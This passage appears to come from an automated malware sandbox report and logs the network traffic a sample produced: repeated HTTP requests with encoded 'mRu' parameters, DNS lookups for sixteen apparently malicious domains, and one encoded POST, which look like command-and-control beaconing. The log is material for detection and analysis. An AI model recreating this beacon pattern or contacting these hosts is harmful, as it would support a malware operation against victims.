39 c0 13 32 89 e3 ff d3 12 d4 ba 44 2f 6a 21 a5 32 eb 84 c4 53 2d dc 5a 99 84 c4 5f 67 9f 7f 9d 13 f5 df cd 3f 3f 7a 4c 6e 9d 04 97 10 63 0d f8 6a ca fc da 52 36 5c b8 ef 00 00 00 ff ff 78 7c 24 01 8e 02 00 00 Data Ascii: 1o0w~oKU!TQ:!'UP@D2ll2'%!$mj$+8e^ fm6Rvl)J@N_W%Jrx\|-lEl[)78=8E#8f&=S\tuH.uaAN;%vpVFVM!*(d E^7FdBHQ}>92D/j!2S-Z_g??zLncjR6\x\|$
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Tue, 12 Nov 2024 14:30:27 GMTContent-Type: text/html; charset=utf-8Content-Length: 337Connection: closeContent-Encoding: gzipVary: Accept-EncodingData Raw: 1f 8b 08 00 00 00 00 00 00 ff 8c 92 31 6f f2 30 10 86 77 7e 85 f1 a7 6f 4b e2 b0 55 21 8e 54 51 3a 21 d1 81 0e 9d 2a 27 be 12 a3 d8 0e ce 85 10 55 fd ef 15 c1 50 40 ad 44 32 e4 de bb dc fb f8 6c a7 e3 a7 e5 6c f5 f6 32 27 25 ea 2a 1b a5 a7 0f 08 99 8d 08 21 24 6d 0a a7 6a 24 8d 2b 38 65 ac 2a a3 d8 5e bd e7 20 2a ac 66 9b 6d 0b ae 8f 36 0d cd 52 76 6c bd f6 29 4a e1 1a 40 4e 5f 57 cf e1 03 25 4a 72 ba 78 7c 9f 2d 17 8b f9 6c 45 ef e5 6c 5b 29 ec e4 37 ce 38 0c 3d 0a fb 1a 38 45 d8 23 db 88 9d 38 66 ef 26 d4 f2 ca 3d 0c bd bf 06 14 b7 53 5c 96 0e 03 ed 14 74 b5 75 48 89 11 1a 2e 75 61 0d 82 41 4e 3b 25 b1 e4 12 76 aa 80 70 10 81 56 46 e9 56 87 4d 21 2a e0 93 28 0e b4 d8 df 64 da 06 dc 20 45 5e 01 37 f6 84 46 85 15 64 1d e4 8d 42 48 d9 51 fa 8d c7 fe 14 1f 9e c3 09 07 b9 95 7d a0 3e 9c d0 f0 39 c0 13 32 89 e3 ff d3 12 d4 ba 44 2f 6a 21 a5 32 eb 84 c4 53 2d dc 5a 99 84 c4 5f 67 9f 7f 9d 13 f5 df cd 3f 3f 7a 4c 6e 9d 04 97 10 63 0d f8 6a ca fc da 52 36 5c b8 ef 00 00 00 ff ff 78 7c 24 01 8e 02 00 00 Data Ascii: 1o0w~oKU!TQ:!'UP@D2ll2'%!$mj$+8e^ fm6Rvl)J@N_W%Jrx\|-lEl[)78=8E#8f&=S\tuH.uaAN;%vpVFVM!*(d E^7FdBHQ}>92D/j!2S-Z_g??zLncjR6\x\|$
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Tue, 12 Nov 2024 14:33:56 GMTContent-Type: text/html; charset=utf-8Content-Length: 337Connection: closeContent-Encoding: gzipVary: Accept-EncodingData Raw: 1f 8b 08 00 00 00 00 00 00 ff 8c 92 31 6f f2 30 10 86 77 7e 85 f1 a7 6f 4b e2 b0 55 21 8e 54 51 3a 21 d1 81 0e 9d 2a 27 be 12 a3 d8 0e ce 85 10 55 fd ef 15 c1 50 40 ad 44 32 e4 de bb dc fb f8 6c a7 e3 a7 e5 6c f5 f6 32 27 25 ea 2a 1b a5 a7 0f 08 99 8d 08 21 24 6d 0a a7 6a 24 8d 2b 38 65 ac 2a a3 d8 5e bd e7 20 2a ac 66 9b 6d 0b ae 8f 36 0d cd 52 76 6c bd f6 29 4a e1 1a 40 4e 5f 57 cf e1 03 25 4a 72 ba 78 7c 9f 2d 17 8b f9 6c 45 ef e5 6c 5b 29 ec e4 37 ce 38 0c 3d 0a fb 1a 38 45 d8 23 db 88 9d 38 66 ef 26 d4 f2 ca 3d 0c bd bf 06 14 b7 53 5c 96 0e 03 ed 14 74 b5 75 48 89 11 1a 2e 75 61 0d 82 41 4e 3b 25 b1 e4 12 76 aa 80 70 10 81 56 46 e9 56 87 4d 21 2a e0 93 28 0e b4 d8 df 64 da 06 dc 20 45 5e 01 37 f6 84 46 85 15 64 1d e4 8d 42 48 d9 51 fa 8d c7 fe 14 1f 9e c3 09 07 b9 95 7d a0 3e 9c d0 f0 39 c0 13 32 89 e3 ff d3 12 d4 ba 44 2f 6a 21 a5 32 eb 84 c4 53 2d dc 5a 99 84 c4 5f 67 9f 7f 9d 13 f5 df cd 3f 3f 7a 4c 6e 9d 04 97 10 63 0d f8 6a ca fc da 52 36 5c b8 ef 00 00 00 ff ff 78 7c 24 01 8e 02 00 00 Data Ascii: 1o0w~oKU!TQ:!'UP@D2ll2'%!$mj$+8e^ fm6Rvl)J@N_W%Jrx\|-lEl[)78=8E#8f&=S\tuH.uaAN;%vpVFVM!*(d E^7FdBHQ}>92D/j!2S-Z_g??zLncjR6\x\|$
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Tue, 12 Nov 2024 14:33:59 GMTContent-Type: text/html; charset=utf-8Content-Length: 337Connection: closeContent-Encoding: gzipVary: Accept-EncodingData Raw: 1f 8b 08 00 00 00 00 00 00 ff 8c 92 31 6f f2 30 10 86 77 7e 85 f1 a7 6f 4b e2 b0 55 21 8e 54 51 3a 21 d1 81 0e 9d 2a 27 be 12 a3 d8 0e ce 85 10 55 fd ef 15 c1 50 40 ad 44 32 e4 de bb dc fb f8 6c a7 e3 a7 e5 6c f5 f6 32 27 25 ea 2a 1b a5 a7 0f 08 99 8d 08 21 24 6d 0a a7 6a 24 8d 2b 38 65 ac 2a a3 d8 5e bd e7 20 2a ac 66 9b 6d 0b ae 8f 36 0d cd 52 76 6c bd f6 29 4a e1 1a 40 4e 5f 57 cf e1 03 25 4a 72 ba 78 7c 9f 2d 17 8b f9 6c 45 ef e5 6c 5b 29 ec e4 37 ce 38 0c 3d 0a fb 1a 38 45 d8 23 db 88 9d 38 66 ef 26 d4 f2 ca 3d 0c bd bf 06 14 b7 53 5c 96 0e 03 ed 14 74 b5 75 48 89 11 1a 2e 75 61 0d 82 41 4e 3b 25 b1 e4 12 76 aa 80 70 10 81 56 46 e9 56 87 4d 21 2a e0 93 28 0e b4 d8 df 64 da 06 dc 20 45 5e 01 37 f6 84 46 85 15 64 1d e4 8d 42 48 d9 51 fa 8d c7 fe 14 1f 9e c3 09 07 b9 95 7d a0 3e 9c d0 f0 39 c0 13 32 89 e3 ff d3 12 d4 ba 44 2f 6a 21 a5 32 eb 84 c4 53 2d dc 5a 99 84 c4 5f 67 9f 7f 9d 13 f5 df cd 3f 3f 7a 4c 6e 9d 04 97 10 63 0d f8 6a ca fc da 52 36 5c b8 ef 00 00 00 ff ff 78 7c 24 01 8e 02 00 00 Data Ascii: 1o0w~oKU!TQ:!'UP@D2ll2'%!$mj$+8e^ fm6Rvl)J@N_W%Jrx\|-lEl[)78=8E#8f&=S\tuH.uaAN;%vpVFVM!*(d E^7FdBHQ}>92D/j!2S-Z_g??zLncjR6\x\|$
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Tue, 12 Nov 2024 14:34:02 GMTContent-Type: text/html; charset=utf-8Content-Length: 337Connection: closeContent-Encoding: gzipVary: Accept-EncodingData Raw: 1f 8b 08 00 00 00 00 00 00 ff 8c 92 31 6f f2 30 10 86 77 7e 85 f1 a7 6f 4b e2 b0 55 21 8e 54 51 3a 21 d1 81 0e 9d 2a 27 be 12 a3 d8 0e ce 85 10 55 fd ef 15 c1 50 40 ad 44 32 e4 de bb dc fb f8 6c a7 e3 a7 e5 6c f5 f6 32 27 25 ea 2a 1b a5 a7 0f 08 99 8d 08 21 24 6d 0a a7 6a 24 8d 2b 38 65 ac 2a a3 d8 5e bd e7 20 2a ac 66 9b 6d 0b ae 8f 36 0d cd 52 76 6c bd f6 29 4a e1 1a 40 4e 5f 57 cf e1 03 25 4a 72 ba 78 7c 9f 2d 17 8b f9 6c 45 ef e5 6c 5b 29 ec e4 37 ce 38 0c 3d 0a fb 1a 38 45 d8 23 db 88 9d 38 66 ef 26 d4 f2 ca 3d 0c bd bf 06 14 b7 53 5c 96 0e 03 ed 14 74 b5 75 48 89 11 1a 2e 75 61 0d 82 41 4e 3b 25 b1 e4 12 76 aa 80 70 10 81 56 46 e9 56 87 4d 21 2a e0 93 28 0e b4 d8 df 64 da 06 dc 20 45 5e 01 37 f6 84 46 85 15 64 1d e4 8d 42 48 d9 51 fa 8d c7 fe 14 1f 9e c3 09 07 b9 95 7d a0 3e 9c d0 f0 39 c0 13 32 89 e3 ff d3 12 d4 ba 44 2f 6a 21 a5 32 eb 84 c4 53 2d dc 5a 99 84 c4 5f 67 9f 7f 9d 13 f5 df cd 3f 3f 7a 4c 6e 9d 04 97 10 63 0d f8 6a ca fc da 52 36 5c b8 ef 00 00 00 ff ff 78 7c 24 01 8e 02 00 00 Data Ascii: 1o0w~oKU!TQ:!'UP@D2ll2'%!$mj$+8e^ fm6Rvl)J@N_W%Jrx\|-lEl[)78=8E#8f&=S\tuH.uaAN;%vpVFVM!*(d E^7FdBHQ}>92D/j!2S-Z_g??zLncjR6\x\|$

Source: global traffic	HTTP traffic detected: GET /mk81/?mRu=gzc9tI9/iKFBs/CfQiHfQ1hmFq4huhxeMTnwpTnTnn57GmdDkYbUUImaMzeYKxMl89CL7o6kx1g4xig0s43SWJ3EiMJuN9y4NOM7gvWFzz5YCjlwg0gKJrc=&UJ=7H1XM HTTP/1.1Host: www.zz83x.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 AOL/9.8 AOLBuild/4346.13.US Safari/537.36
Source: global traffic	HTTP traffic detected: GET /4wc1/?mRu=2onXjOgtXs7bFrsmBuZreqMXUphshRxX5MKbqzS42irGFJYns6q4JN3vt1eB5PqznJS/LdYYFyeg3ON9AeFtKxD4o+R2FH9zSHG9zjVrST6RS49i0a4KyRw=&UJ=7H1XM HTTP/1.1Host: www.wukong.collegeAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 AOL/9.8 AOLBuild/4346.13.US Safari/537.36
Source: global traffic	HTTP traffic detected: GET /6yjb/?mRu=VYNzRxyQK7JD7ZohbYVagv51ruE2l0awbhfoJPQ4rqLtN/pKU1ruR3BE6r+8vb9gac3NpWXxvYS6rs+3SUr3GMlMxkDr3AnCXH8/Zbk4o49navQqKFljaLg=&UJ=7H1XM HTTP/1.1Host: www.qiusuo.vipAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 AOL/9.8 AOLBuild/4346.13.US Safari/537.36
Source: global traffic	HTTP traffic detected: GET /h7d8/?mRu=6+VCk9pNPTQZYCZ6d4PN3EmbuLb87q5olpsVnOemsYlmrkAHkUX/D7H9eR5xtWpIZUSGBjAAXrZ9ZbWt4k2m/mELc90NwjhxnhDwTkUjNTY6s8tAYo2upp8=&UJ=7H1XM HTTP/1.1Host: www.pg874.shopAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 AOL/9.8 AOLBuild/4346.13.US Safari/537.36
Source: global traffic	HTTP traffic detected: GET /xvf3/?mRu=WlBP6ZDj33sme071J7YmRt2meznD9lOMeO4smNCsOshEYDb+rkIOBjcGODqfewmlgMUUULEtW3alEv1cIqlE3oXaOj92B6nyIwOIgW4/F45i+leDgRmHhUA=&UJ=7H1XM HTTP/1.1Host: www.rimberiokitchen.onlineAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 AOL/9.8 AOLBuild/4346.13.US Safari/537.36
Source: global traffic	HTTP traffic detected: GET /cadc/?mRu=yfxAwDfWka0dfjkEErxT6WYgWaOc4HN689PIo8avXNW9JAsEk9V7nvZjppH3ozqb+GZGdofwBlLzR01W2aLtY3/CfTpxh0qnHwCWqwdq33lIMBmS8NPwCm4=&UJ=7H1XM HTTP/1.1Host: www.futurevision.lifeAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 AOL/9.8 AOLBuild/4346.13.US Safari/537.36
Source: global traffic	HTTP traffic detected: GET /a18n/?mRu=GNYnn+/HdyV8duRMqtcyXm0xy6A5R7OP0g3qQsxli+rcIWT14zRUDqgxNRAzolcecH8yu9AKKAak4SdSyZ6RvIdAVt2QUT1IwNlPBAoCd8CxXhf8uuYrVNc=&UJ=7H1XM HTTP/1.1Host: www.dreampay.shopAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 AOL/9.8 AOLBuild/4346.13.US Safari/537.36
Source: global traffic	HTTP traffic detected: GET /wie9/?mRu=lL7P/0JUYVbqWckkUFA5AZs0yLHF2CZptxiRtFaWww2Jt1+4Ybj8qDPeqsoco5xM//SPE5hjfF332jPzZ07z97WSr/ctCPXD3Kda+wiI2ZiEZuGqb25QMsE=&UJ=7H1XM HTTP/1.1Host: www.jigg.spaceAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 AOL/9.8 AOLBuild/4346.13.US Safari/537.36
Source: global traffic	HTTP traffic detected: GET /cbd3/?mRu=HW/lerOyVqCXu7n0t/EUlYJ02y1yNdHzoGstxvzncQbYfsbQeR2dtxxMvMPrm1eSchBLBkAlfh8ey4GsUHcWZCjdVQ1E0is8tfiw+yJHiCAhhuX0KyTHXeE=&UJ=7H1XM HTTP/1.1Host: www.econsultoria.onlineAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 AOL/9.8 AOLBuild/4346.13.US Safari/537.36
Source: global traffic	HTTP traffic detected: GET /zis1/?mRu=9Akn8HQ/w9IGHY5hfK3Sz2XWYTq6JbeGUZoZjuxeZl7qmmC+7O6Wru/gQUs9lGhVdHn4ksWgMiMPd3qmb+i3xZVXvSH4PNUsYgsF4Q6R4VB3b48Gv0g7yoc=&UJ=7H1XM HTTP/1.1Host: www.webworld.digitalAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 AOL/9.8 AOLBuild/4346.13.US Safari/537.36
Source: global traffic	HTTP traffic detected: GET /fid8/?mRu=TlJ1g/LEHcod8cWOxAq9FP73H09YVH7WgnCIHnyD26ULKZOEEsjMueNmMu+sImVaRLKPh0l5mf17vNoqkS6RVPulxmIy09RerMB73PEzvxMXDGvmWRP6LAE=&UJ=7H1XM HTTP/1.1Host: www.smartbuyoffer.onlineAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 AOL/9.8 AOLBuild/4346.13.US Safari/537.36
Source: global traffic	HTTP traffic detected: GET /lp9q/?mRu=Tgs0l5rQdINE0HmohrfgPmtVT9TM6mRmz28qlq5N+W6TIOOkclTpEHygPFllR64ZyPP4U6P7xjaKPMS0ZS1/tTAw9ro2DSZN0V3b+mDHt47uSUTeFI2WDZw=&UJ=7H1XM HTTP/1.1Host: www.makerpay.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 AOL/9.8 AOLBuild/4346.13.US Safari/537.36
Source: global traffic	HTTP traffic detected: GET /yiph/?mRu=LkalMmDuboj4872empR9rFcNrijVZ/XXOKlfHTPEe/ophG0OElyabBCkCoxIRZ4fKVtkhMIDAwIoplbOZBCU2IJMHRXqXMq09ankZnsM2pers/hD+qKFjlc=&UJ=7H1XM HTTP/1.1Host: www.jiujiuxi.loveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 AOL/9.8 AOLBuild/4346.13.US Safari/537.36
Source: global traffic	HTTP traffic detected: GET /z4qw/?mRu=lw0Z9E/N2I/dpWlk8pTLJHRCZkuY3j9SfKchD5ao+gJdMbWwfo1urvInPerR2ecaSF54xdut+09OjjfToxgsYGp4jUJZlMustb83Phs9Oq/TesXOyzSulKc=&UJ=7H1XM HTTP/1.1Host: www.moneys.fitAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 AOL/9.8 AOLBuild/4346.13.US Safari/537.36
Source: global traffic	HTTP traffic detected: GET /x1pj/?mRu=rrUVFAplNZMcakJZOJE4CcqToYvowPkUAgJ/Lg0h4NOzPxri4UWPxE+iyT5MFYFQlY7+f2AMywjhKYvv2dkZ2pTnN7HLjvrDE8g/sgQAyuCfG8ldMNFJeds=&UJ=7H1XM HTTP/1.1Host: www.vnxoso88.artAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 AOL/9.8 AOLBuild/4346.13.US Safari/537.36
Source: global traffic	HTTP traffic detected: GET /rzaq/?mRu=S7FCB2U3I5+MEOix97haLm8n4ZiU5s+sYyIa9Io4LXSLJStcMtKrD203LPev0YXMiZ/cleh4jZ/UsKrDR5eop/VU9oI7TN7VO3RaOL7GPdXsiE9kkN1XODc=&UJ=7H1XM HTTP/1.1Host: www.ebook.farmAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 AOL/9.8 AOLBuild/4346.13.US Safari/537.36
Source: global traffic	HTTP traffic detected: GET /mk81/?mRu=gzc9tI9/iKFBs/CfQiHfQ1hmFq4huhxeMTnwpTnTnn57GmdDkYbUUImaMzeYKxMl89CL7o6kx1g4xig0s43SWJ3EiMJuN9y4NOM7gvWFzz5YCjlwg0gKJrc=&UJ=7H1XM HTTP/1.1Host: www.zz83x.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 AOL/9.8 AOLBuild/4346.13.US Safari/537.36
Source: global traffic	HTTP traffic detected: GET /4wc1/?mRu=2onXjOgtXs7bFrsmBuZreqMXUphshRxX5MKbqzS42irGFJYns6q4JN3vt1eB5PqznJS/LdYYFyeg3ON9AeFtKxD4o+R2FH9zSHG9zjVrST6RS49i0a4KyRw=&UJ=7H1XM HTTP/1.1Host: www.wukong.collegeAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 AOL/9.8 AOLBuild/4346.13.US Safari/537.36
Source: global traffic	HTTP traffic detected: GET /6yjb/?mRu=VYNzRxyQK7JD7ZohbYVagv51ruE2l0awbhfoJPQ4rqLtN/pKU1ruR3BE6r+8vb9gac3NpWXxvYS6rs+3SUr3GMlMxkDr3AnCXH8/Zbk4o49navQqKFljaLg=&UJ=7H1XM HTTP/1.1Host: www.qiusuo.vipAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 AOL/9.8 AOLBuild/4346.13.US Safari/537.36
Source: global traffic	HTTP traffic detected: GET /h7d8/?mRu=6+VCk9pNPTQZYCZ6d4PN3EmbuLb87q5olpsVnOemsYlmrkAHkUX/D7H9eR5xtWpIZUSGBjAAXrZ9ZbWt4k2m/mELc90NwjhxnhDwTkUjNTY6s8tAYo2upp8=&UJ=7H1XM HTTP/1.1Host: www.pg874.shopAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 AOL/9.8 AOLBuild/4346.13.US Safari/537.36
Source: global traffic	HTTP traffic detected: GET /xvf3/?mRu=WlBP6ZDj33sme071J7YmRt2meznD9lOMeO4smNCsOshEYDb+rkIOBjcGODqfewmlgMUUULEtW3alEv1cIqlE3oXaOj92B6nyIwOIgW4/F45i+leDgRmHhUA=&UJ=7H1XM HTTP/1.1Host: www.rimberiokitchen.onlineAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 AOL/9.8 AOLBuild/4346.13.US Safari/537.36
Source: global traffic	HTTP traffic detected: GET /cadc/?mRu=yfxAwDfWka0dfjkEErxT6WYgWaOc4HN689PIo8avXNW9JAsEk9V7nvZjppH3ozqb+GZGdofwBlLzR01W2aLtY3/CfTpxh0qnHwCWqwdq33lIMBmS8NPwCm4=&UJ=7H1XM HTTP/1.1Host: www.futurevision.lifeAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 AOL/9.8 AOLBuild/4346.13.US Safari/537.36
Source: global traffic	HTTP traffic detected: GET /a18n/?mRu=GNYnn+/HdyV8duRMqtcyXm0xy6A5R7OP0g3qQsxli+rcIWT14zRUDqgxNRAzolcecH8yu9AKKAak4SdSyZ6RvIdAVt2QUT1IwNlPBAoCd8CxXhf8uuYrVNc=&UJ=7H1XM HTTP/1.1Host: www.dreampay.shopAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 AOL/9.8 AOLBuild/4346.13.US Safari/537.36
Source: global traffic	HTTP traffic detected: GET /wie9/?mRu=lL7P/0JUYVbqWckkUFA5AZs0yLHF2CZptxiRtFaWww2Jt1+4Ybj8qDPeqsoco5xM//SPE5hjfF332jPzZ07z97WSr/ctCPXD3Kda+wiI2ZiEZuGqb25QMsE=&UJ=7H1XM HTTP/1.1Host: www.jigg.spaceAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 AOL/9.8 AOLBuild/4346.13.US Safari/537.36
Source: global traffic	HTTP traffic detected: GET /cbd3/?mRu=HW/lerOyVqCXu7n0t/EUlYJ02y1yNdHzoGstxvzncQbYfsbQeR2dtxxMvMPrm1eSchBLBkAlfh8ey4GsUHcWZCjdVQ1E0is8tfiw+yJHiCAhhuX0KyTHXeE=&UJ=7H1XM HTTP/1.1Host: www.econsultoria.onlineAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 AOL/9.8 AOLBuild/4346.13.US Safari/537.36

Source: global traffic	DNS traffic detected: DNS query: www.zz83x.top
Source: global traffic	DNS traffic detected: DNS query: www.wukong.college
Source: global traffic	DNS traffic detected: DNS query: www.qiusuo.vip
Source: global traffic	DNS traffic detected: DNS query: www.pg874.shop
Source: global traffic	DNS traffic detected: DNS query: www.rimberiokitchen.online
Source: global traffic	DNS traffic detected: DNS query: www.futurevision.life
Source: global traffic	DNS traffic detected: DNS query: www.dreampay.shop
Source: global traffic	DNS traffic detected: DNS query: www.jigg.space
Source: global traffic	DNS traffic detected: DNS query: www.econsultoria.online
Source: global traffic	DNS traffic detected: DNS query: www.webworld.digital
Source: global traffic	DNS traffic detected: DNS query: www.smartbuyoffer.online
Source: global traffic	DNS traffic detected: DNS query: www.makerpay.xyz
Source: global traffic	DNS traffic detected: DNS query: www.jiujiuxi.love
Source: global traffic	DNS traffic detected: DNS query: www.moneys.fit
Source: global traffic	DNS traffic detected: DNS query: www.vnxoso88.art
Source: global traffic	DNS traffic detected: DNS query: www.ebook.farm

Source: unknown

HTTP traffic detected: POST /4wc1/ HTTP/1.1Host: www.wukong.collegeAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-USAccept-Encoding: gzip, deflate, brOrigin: http://www.wukong.collegeReferer: http://www.wukong.college/4wc1/Content-Type: application/x-www-form-urlencodedContent-Length: 200Connection: closeCache-Control: max-age=0User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 AOL/9.8 AOLBuild/4346.13.US Safari/537.36Data Raw: 6d 52 75 3d 37 71 50 33 67 37 70 48 59 74 33 35 42 62 68 4e 4d 50 31 41 4a 70 38 37 4c 76 77 48 35 55 39 4c 36 38 62 41 75 79 47 62 6a 78 4f 4e 4b 70 55 6b 73 75 75 59 43 37 58 49 6c 55 4c 48 35 64 50 39 75 4f 69 4c 47 2f 77 61 63 78 71 66 6f 36 74 47 54 50 77 4a 58 6a 4b 74 39 4d 46 51 4e 47 39 41 57 47 79 62 69 42 5a 44 44 48 6d 51 62 70 52 63 70 73 49 69 30 52 7a 4e 37 6b 5a 72 59 59 49 6e 37 37 36 51 34 2b 36 6c 41 6d 6b 4d 38 4f 74 62 4a 42 51 52 36 68 54 37 55 6c 4d 50 38 68 4c 34 70 58 67 6b 6a 2b 7a 68 78 6d 77 72 38 70 45 73 61 47 73 2b 73 76 45 41 4f 43 36 69 77 74 79 44 4c 77 3d 3d Data Ascii: mRu=7qP3g7pHYt35BbhNMP1AJp87LvwH5U9L68bAuyGbjxONKpUksuuYC7XIlULH5dP9uOiLG/wacxqfo6tGTPwJXjKt9MFQNG9AWGybiBZDDHmQbpRcpsIi0RzN7kZrYYIn776Q4+6lAmkM8OtbJBQR6hT7UlMP8hL4pXgkj+zhxmwr8pEsaGs+svEAOC6iwtyDLw==

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 12 Nov 2024 14:29:49 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "66f0ea70-94"Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not 